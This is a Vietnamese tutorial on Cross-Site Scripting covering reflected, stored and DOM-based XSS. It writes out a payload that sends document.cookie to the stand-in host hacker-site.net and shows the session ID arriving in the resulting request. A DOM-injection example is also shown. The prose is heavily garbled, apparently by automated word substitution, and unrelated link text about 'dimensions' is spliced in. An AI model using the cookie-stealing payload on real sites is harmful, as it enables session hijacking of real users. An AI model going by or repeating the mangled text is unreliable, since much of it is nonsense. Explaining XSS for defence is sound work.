Tiếp nối loạt bài bác về Security, từ bây giờ chúng ta sẽ cùng nhau tò mò về lỗ hổng Cross-Site Scripting.

1. Cross-site Scripting là gì?

Cross-site scripting là một trong lỗ hổng thịnh hành trong vận dụng web. Để khai thác một lỗ hổng XSS, hacker sẽ chèn mã độc trải qua các đoạn script để thực hiện chúng nghỉ ngơi phía client. Thông thường, các cuộc tấn công XSS được thực hiện để thừa qua các kiểm soát điều hành truy cập với mạo danh fan dùng. Phân loại: gồm 3 các loại Reflected XSS, Stored XSS và DOM-based XSS

2. Reflected XSS

Ở kịch bạn dạng này, hacker sẽ gửi cho nạn nhân một URL bao gồm chứa đoạn mã nguy hiểm. Nạn nhân chỉ việc gửi request cho URL này thì hacker sẽ có được hiệu quả mong muốn. Cụ thể: 1. Người dùng đăng nhập web và giả sử được gán session: Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 2. Bằng cách nào đó, hacker gửi được cho những người dùng URL: http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie; đưa sử example.com là website nàn nhân tầm nã cập, hacker-site.net là trang của hacker tạo nên 3. Nàn nhân truy cập đến URL trên 4. Server bình luận cho nàn nhân, kèm với tài liệu có trong request(đoạn javascript của hacker) 5. Trình trông nom nạn nhân nhận đánh giá và xúc tiến đoạn javascript 6. Đoạn javascript mà lại hacker tạo thành thực tế như sau: var i=new Image; i.src=”http://hacker-site.net/”+document.cookie; loại lệnh trên bản chất thực hiện tại request cho site của tin tặc với tham số là cookie tín đồ dùng: GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1 Host: hacker-site.net 7. Từ bỏ phía site của mình, tin tặc sẽ bắt được ngôn từ request trên với coi như session của người dùng sẽ bị chiếm. Đến thời điểm này, hacker có thể giả mạo cùng với tư giải pháp nạn nhân và thực hiện mọi quyền trên website cơ mà nạn nhân có. Kịch bạn dạng khai thác:

3. Stored XSS:

Khác cùng với Reflected tấn công trực tiếp vào một vài nạn nhân mà tin tặc nhắm đến, Stored XSS đào bới nhiều nạn nhân hơn. Lỗi này xẩy ra khi vận dụng web không kiểm tra kỹ các dữ liệu đầu vào trước lúc lưu vào cơ sở tài liệu (ở phía trên tôi dùng khái niệm này nhằm chỉ database, tệp tin hay những khu vực khác nhằm mục tiêu lưu trữ tài liệu của ứng dụng web). Lấy ví dụ như những form góp ý, các phản hồi … trên những trang web. Với nghệ thuật Stored XSS , tin tặc không khai thác trực tiếp nhưng mà phải tiến hành tối thiểu qua 2 bước. Đầu tiên tin tặc sẽ thông qua các điểm đầu vào (form, input, textarea…) không được khám nghiệm kỹ nhằm chèn vào CSDL những đoạn mã nguy hiểm. Tiếp theo, khi người tiêu dùng truy cập vào áp dụng web và thực hiện các thao tác liên quan đến tài liệu được lưu này, đoạn mã của hacker sẽ tiến hành thực thi trên trình duyệt bạn dùng. Kịch bản khai thác:

*

Reflected XSS cùng Stored XSS bao gồm 2 sự biệt lập lớn trong quá trình tấn công. • sản phẩm nhất, để khai thác Reflected XSS, tin tặc phải lừa được nàn nhân truy vấn vào URL của mình. Còn Stored XSS không nhất thiết phải thực hiện bài toán này, sau thời điểm chèn được mã nguy nan vào cơ sở dữ liệu của ứng dụng, hacker chỉ việc ngồi chờ nạn nhân auto truy cập vào. Với nạn nhân, vấn đề này là trả toàn thông thường vì họ không còn hay biết tài liệu mình truy tìm cập đã biết thành nhiễm độc. • vật dụng 2, phương châm của tin tặc sẽ dễ dãi đạt được hơn giả dụ tại thời điểm tấn công nạn nhân vẫn vào phiên làm cho việc(session) của vận dụng web. Với Reflected XSS, hacker hoàn toàn có thể thuyết phục tuyệt lừa nạn nhân đăng nhập rồi truy cập đến URL nhưng mà hắn ta hỗ trợ để xúc tiến mã độc. Tuy vậy Stored XSS thì khác, vì mã độc đã được lưu trong csdl Web đề nghị bất cứ bao giờ người dùng truy cập các tính năng liên quan tiền thì mã độc sẽ được thực thi, với nhiều khả năng là những tính năng này yêu thương cầu đề xuất xác thực(đăng nhập) trước bắt buộc hiển nhiên trong thời gian này người tiêu dùng vẫn sẽ trong phiên làm cho việc. Từ phần đông điều này có thể thấy Stored XSS nguy hiểm hơn Reflected XSS khôn cùng nhiều, đối tượng bị ảnh hưởng có thay là tất cả nhưng người sử dụng ứng dụng web đó. Và nếu nàn nhân tất cả vai trò quản ngại trị thì còn tồn tại nguy cơ bị chiếm quyền điều khiển và tinh chỉnh web.

4. DOM Based XSS

DOM Based XSS là kỹ thuật khai quật XSS dựa trên việc biến hóa cấu trúc DOM của tài liệu, rõ ràng là HTML.


Bạn đang xem: Lỗi xss là gì


Xem thêm: Dimensions Là Gì ? Đây Là Một Thuật Ngữ Kinh Tế Tài Chính Nghĩa Của Từ Dimension

Chúng ta cùng để mắt tới một ví dụ ví dụ sau. Một website gồm URL mang lại trang đăng ký như sau: http://example.com/register.php?message=Please fill in the form Khi truy cập đến thì bọn họ thấy một khung rất thông thường

*
Thay vị truyền

message=Please fill in the formthì truyền

message=Gender
function show()alert();

*

Người dùng sẽ chẳng chút nghi vấn với một khung “bình thường” như vậy này, với khi chắt lọc giới tính, Script sẽ được thực thi

*